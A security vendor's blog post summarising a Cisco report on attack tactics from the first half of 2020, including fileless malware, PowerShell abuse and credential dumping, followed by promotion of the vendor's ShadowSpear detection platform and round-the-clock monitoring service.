A new report released by Cisco this past Monday examines the most common attack trends observed in the wild during the first half of 2020. Cisco studied the most common tactics, techniques, and procedures (TTPs) used by Threat Actors and classified them using the MITRE ATT&CK framework. The report also outlined the Indicators of Compromise (IOCs) associated with these threats.
The MITRE ATT&CK framework is a comprehensive knowledge base of the tactics and techniques leveraged by Threat Actors to attack enterprise systems. Cisco’s findings show that the most common MITRE ATT&CK tactics used against enterprise networks are defense evasion and code execution.
MITRE defines defense evasion as the techniques used by Threat Actors to avoid detection during a security compromise. This can include the disabling of any security tools present in the environment, obfuscation of malicious scripts, and abusing legitimate processes to hide their malicious actions.
Code execution is defined by MITRE as the various ways an attacker can run malicious code within an environment through commands or scripts. Oftentimes, the malicious code is run by abusing legitimate built-in Windows features such as Windows Management Instrumentation (WMI) and PowerShell.
Cisco also took a close look at the Indicators of Compromise associated with these tactics and the most common IOCs observed in victim networks were fileless malware, the use of PowerShell tools, and credential dumping tools. These three indicators alone make up 75% of the critical severity IOCs.
The most prevalent IOC outlined in Cisco’s report, fileless malware, has been a trend in the threat landscape for a few years now and operates strictly in memory unlike traditional malware. By running in memory and not leaving a footprint on the hard-drive, fileless malware can stealthily avoid detection by traditional security tools. Two of the common ways fileless malware can go undetected include process injection (injecting malicious code into legitimate process) and modification of the Windows Registry to include malicious code.
This information is no surprise to SpearTip’s Security Operations Center. Our team observes these TTPs and IOCs on a daily basis through our Incident Response and MDR practice. During a ransomware investigation, we commonly see the use of tools such as Mimikatz for credential dumping, PowerShell Empire for running scripts in memory, Cobalt Strike for various post-exploitation actions, PsExec for remote execution of ransomware payloads, and the use of banking trojans to gain an initial foothold in a victim network.
The threat landscape is evolving on a daily basis. This information is critical for network defenders and should be examined closely so teams can know where to best direct available resources. In order to prevent modern threats, enterprise security teams need to have a reliable EDR tool installed on all servers and workstations. Relying on traditional anti-virus agents to protect your systems is a big mistake. SpearTip has responded to numerous major security incidents where the Threat Actors were easily able to bypass traditional AV tools and go undetected by the security team.
SpearTip’s ShadowSpear® Platform is suited well for detecting and preventing the advanced threats outlined in Cisco’s report. ShadowSpear’s Memory Injection Prevention module specifically is going to protect our partners from the evasion techniques utilized by Threat Actors. Our SOC analysts are experienced in spotting these threats and monitor our partner networks around the clock every day of the year.
SpearTip is constantly watching for new malware and manipulative programs. Our 24/7 Security Operations Center (SOC) is fully staffed with cybersecurity professionals to monitor and protect your environment. Not only are our cybersecurity teammates continuously preventing cyberattacks, but also able to deploy our proprietary tool, ShadowSpear® in an environment before or after an attack.